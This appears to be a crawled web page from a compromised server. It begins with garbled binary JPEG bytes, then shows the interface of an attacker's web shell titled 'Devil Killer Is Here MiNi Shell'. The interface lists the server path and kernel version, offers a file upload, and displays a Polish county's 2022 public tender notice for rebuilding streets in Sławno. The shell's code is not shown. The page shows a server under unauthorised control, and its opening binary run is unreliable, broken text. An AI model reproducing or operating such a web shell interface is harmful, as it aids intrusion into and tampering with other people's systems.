JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220615/0020964101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa ulic: Jagiełły, Chopina i Gdańska w miejscowości Sławno </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT SŁAWIEŃSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979720</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stefanii Sempołowskiej 2A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sławno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">e.sokolowska@powiatslawno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatslawno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa ulic: Jagiełły, Chopina i Gdańska w miejscowości Sławno </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5ff3230d-ec6e-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00209641</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00005525/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Przebudowa ulic: Jagiełły, Chopina i Gdańska w mejscowości Sławno</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.powiatslawno.pl/public/?id=171529 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">3.1. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy zamawiającym<br/>a wykonawcami odbywa się przy użyciu następujących narzędzi:<br/>− miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/<br/>− ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal/<br/>− poczty elektronicznej: e.sokolowska@powiatslawno.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.3. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na<br/>ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3.4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu (<br/>https://miniportal.uzp.gov.pl ) oraz w Regulaminie ePUAP.<br/>3.5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularz do komunikacji” wynosi 150 MB.<br/>3.6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>3.7. Identyfikator postępowania dla danego postępowania o udzielenie zamówienia dostępny są na liście wszystkich postępowań na<br/>miniPortalu oraz stanowi załącznik nr 10 do niniejszej SWZ.<br/>3.8. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla<br/>Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>4. Sposób komunikowania się zamawiającego z wykonawcami (nie dotyczy składania ofert).<br/>4.1. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym<br/>a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się<br/>elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem postępowania, tj. DI.272.7.2022.I.<br/>4.2. Zamawiający może również komunikować się z wykonawcami za pomocą poczty elektronicznej, email:<br/>e.sokolowska@powiatslawno.pl<br/>4.3. Dokumenty elektroniczne, składane są przez wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany<br/>w pkt 4.2 adres email. Sposób sporządzenia dokumentów elektronicznych, musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia<br/>23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>4.4. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się<br/>przy użyciu środków komunikacji elektronicznej. [art. 61 ust 1 ustawy pzp]<br/>4.5. Komunikacja ustna dopuszczalna jest w odniesieniu do informacji, które nie są istotne,<br/>w szczególności nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia, potwierdzenia zainteresowania, ofert, o ile jej<br/>treść jest udokumentowana. [art. 61 ust 1 ustawy pzp]<br/>4.6. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny<br/>z regulaminami korzystania z ePUAP oraz miniPortalu.<br/>Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane<br/>kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 oraz art. 14 ust 1-<br/>3rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawieochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnegoprzepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o „RODO”informujemy, że:1. administratorem Pani/Pana danych osobowych jest Powiat Sławieński –<br/>StarostwoPowiatowe w Sławnie ul. Sempołowskiej 2a, 76-100 Sławno;2. we wszelkich sprawach<br/>związanych zochroną danych osobowych można kontaktować się z inspektorem danych osobowych, email:<br/>iodo@powiatslawno.pl, tel. 59 810 64 31 lub na adres wskazany powyżej;3. dane<br/>osoboweprzetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu przeprowadzenia<br/>postępowania oudzielenie zamówienia publicznego pn. „ Przebudowa ulic: Jagiełły, Chopina i Gdańska w miejscowości Sławno” -<br/>DI.272.7.2022.I, prowadzonego wtrybie przetargu nieograniczonego oraz jego realizacji;4. dane<br/>osobowe mogą zostać przekazane /powierzone osobom lub podmiotom, którym udostępniona zostanie<br/>dokumentacja postępowaniaprzetargowego w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29<br/>stycznia 2004 r. – Prawozamówień publicznych (Dz. U. z 2019 r. poz. 1843), dalej „ustawa Pzp” oraz<br/>podmiotom, które na mocyobowiązujących przepisów prawa mogą dokonywać oceny, weryfikacji i<br/>kontroli prowadzonegopostępowania i realizacji zadania, w tym w szczególności dokumentacji<br/>związanej z pozyskiwaniemśrodków finansowych pochodzących z budżetu państwa i Unii<br/>Europejskiej;5. dane osobowe nie będąprzekazywane poza teren Polski / UE / Europejskiego Obszaru<br/>Gospodarczego;6. dane osobowe będąprzechowywane przez okres wynikający z obowiązujących<br/>terminów archiwizacji, w tym wszczególności w oparciu o zapisy ustawy z dnia 14 czerwca 1960 r.<br/>Kodeks postępowaniaadministracyjnego (Dz. U. z 2017 r. poz. 1257, z 2018 r. poz. 149 i 650), ustawy<br/>z dnia 14 lipca 1983 r.o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2018 r., poz. 217, 650,<br/>357 i 398) oraz ustawyPzp;7. obowiązek podania danych osobowych jest wymogiem ustawowym<br/>określonym w przepisachustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego, akonsekwencje ich niepodania wynikają z ustawy Pzp; 8. w odniesieniu do danych<br/>osobowych decyzjenie będą podejmowane w sposób zautomatyzowany, o którym mowa w art. 22<br/>RODO;9. osoba, którejdane dotyczą ma prawo do:1) dostępu do danych na podstawie art. 15<br/>RODO;2) sprostowania danychzgodnie z zapisami art. 16 RODO;3) żądania ograniczenia<br/>przetwarzania danych osobowych napodstawie art. 18 RODO z wyjątkiem przechowywania, w celu<br/>zapewnienia korzystania ze środkówochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważnewzględy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego;− prawo do wniesieniaskargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzna Pani/Pan, że przetwarzanie danychosobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;10. osoba, której dane dotyczą nie maprawa do:1) usunięcia danych osobowych w związku z<br/>art. 17 ust. 3 lit. B, d i e RODO;2) przenoszeniadanych osobowych, o którym mowa w art. 20 RODO;3)<br/>sprzeciwu, wobec przetwarzania danychosobowych na podstawie art. 21 RODO, gdyż podstawą<br/>przetwarzania danych jest art. 6 ust. 1 lit. c i eRODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3lit.b,d<br/>lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia<br/>danychosobowych,októrym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo<br/>sprzeciwu,wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana<br/>danych osobowych jest art. 6 ust.1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DI.272.7.2022.I</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZAKRES PRZEDMIOTU ZAMÓWIENIA OBEJMUJE NASTĘPUJĄCE ZADANIA:<br/>1. PRZEBUDOWĘ ULICY GDAŃSKIEJ W SŁAWNIE w formule zaprojektuj i wybuduj;<br/>2. PRZEBUDOWĘ ULICY JAGIEŁŁY W SŁAWNIE w formule zaprojektuj i wybuduj;<br/>3. PRZEBUDOWĘ ULICY CHOPINA W SŁAWNIE;<br/>Szczegółowy opis przedmiotu zamówienia został opisany w SWZ - Rozdział 6. OPIS PRZEDMIOTU ZAMÓWIENIA. (ART.<br/>281 UST. 1 PKT 5 USTAWY PZP) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71500000-3 - Usługi związane z budownictwem</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje możliwość udzielenia zamówień, polegających na<br/>powtórzeniupodobnych robót budowlanych, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, w<br/>wysokości do15% wartości zamówienia podstawowego. Realizując obowiązki wynikające z art. 214 ust.<br/>1 pkt 7 wzw. z art. 214 ust. 2 ustawy Pzp, Zamawiający wskazuje, że zakres to: do 30 % wartości<br/>zamówieniapodstawowego, a warunki przewidywanych robót: analogiczne jak zamówienie podstawowe<br/>tzn.warunki nie ulegną zmianie. Ewentualne zamówienia podobne zostaną udzielone po negocjacjach<br/>wtrybie zamówienia z wolnej ręki i zostanie zawarta nowa umowa z Wykonawcą<br/>zamówieniapodstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W postępowaniu, o których mowa w art. 112 ust. 2 pkt 3 i 4 ustawy pzp, oraz, jeżeli to dotyczy, kryteriów selekcji, a także<br/>bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem wykonawcy.<br/>[art. 119 ustawy pzp].<br/>Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji<br/>finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych<br/>zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy. [art. 120 ustawy pzp].<br/>2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>2.1. Nie podlegają wykluczeniu<br/>2.2. Spełniają warunki udziału w postępowaniu określone przez zamawiającego w ogłoszeniu o zamówieniu i niniejszej<br/>SWZ.<br/>3. Zamawiający wymaga wykazania przez wykonawcę ubiegającego się o udzielenia zamówienia, spełnienia warunków<br/>udziału w postępowaniu dotyczących [art. 112 ust 2 ustawy pzp]:<br/>3.1. Zdolności do występowania w obrocie gospodarczym [art. 113 ustawy pzp]:<br/>Opis spełnienia warunków:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków<br/>w tym zakresie. Zamawiający nie dokona oceny spełnienia tego warunku<br/>w postępowaniu.<br/>3.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej o ile wynika z odrębnych przepisów<br/>[art. 114 ustawy pzp]:<br/>Opis spełnienia warunków:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków<br/>w tym zakresie. Zamawiający nie dokona oceny spełnienia tego warunku<br/>w postępowaniu.<br/>3.3. Sytuacji ekonomicznej lub finansowej [art. 115 ustawy pzp]:<br/>Opis spełnienia warunków:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków<br/>w tym zakresie. Zamawiający nie dokona oceny spełnienia tego warunku<br/>w postępowaniu.<br/>3.4. Zdolności technicznej lub zawodowej [art. 116 ustawy pzp]:<br/>Opis spełnienia warunków:<br/>Warunek ten zostanie spełniony, jeżeli wykonawca:<br/>3.4.1.<br/>1. Wykonawca wykaże, że wykonał min. 1 robotę budowlaną o wartości nie mniejszej niż 1.000.000,00 zł brutto o<br/>charakterze podobnym do przedmiotu zamówienia w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania<br/>oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i<br/>prawidłowo ukończone,<br/>Warunek ten ma być spełniony:<br/>− samodzielnie przez wykonawcę, lub<br/>− przez minimum jeden inny podmiot udostępniający wykonawcy swoją wiedzę i doświadczenie i który zrealizuje te roboty,<br/>lub<br/>− w przypadku wykonawców występujących wspólnie – samodzielnie przez minimum jednego z wykonawców<br/>występujących wspólnie.<br/>Uwagi:<br/>1. Jeżeli wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), zamawiający nie dopuszcza by wykonawca<br/>polegał na doświadczeniu grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał<br/>wykazywanego zakresu usług. Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie<br/>faktycznie konkretnie wykonywanego zakresu usług oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z<br/>której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur.<br/>2. Zamawiający uzna za spełniony warunek SWZ również w przypadku, gdy doświadczenie wykazane przez wykonawcę<br/>obejmuje szerszy zakres robót od wymaganych przez zamawiającego.<br/>3. W przypadku złożenia przez wykonawców dokumentów zawierających kwoty wyrażone w innych walutach niż PLN, dla<br/>potrzeb oceny spełniania warunku określonego powyżej, zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs<br/>danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień<br/>Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, Narodowy Bank Polski<br/>nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany<br/>pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on<br/>opublikowany.<br/>3.4.2. Wykonawca wykaże, że dysponuje osobami:<br/>1. DOTYCZY ZADANIA I i II:<br/>- 1 osobą - kierownik budowy/ kierownik robót drogowych - posiadający uprawnienia budowlane do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie w specjalności drogowej, bez ograniczeń zgodne z ustawą Prawo<br/>budowlane,<br/>- 1 osobą – kierownik robót branżowych posiadający uprawienia budowlane do sprawowania samodzielnych funkcji<br/>technicznych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych oraz<br/>wodociągowych i kanalizacyjnych zgodne z ustawą Prawo 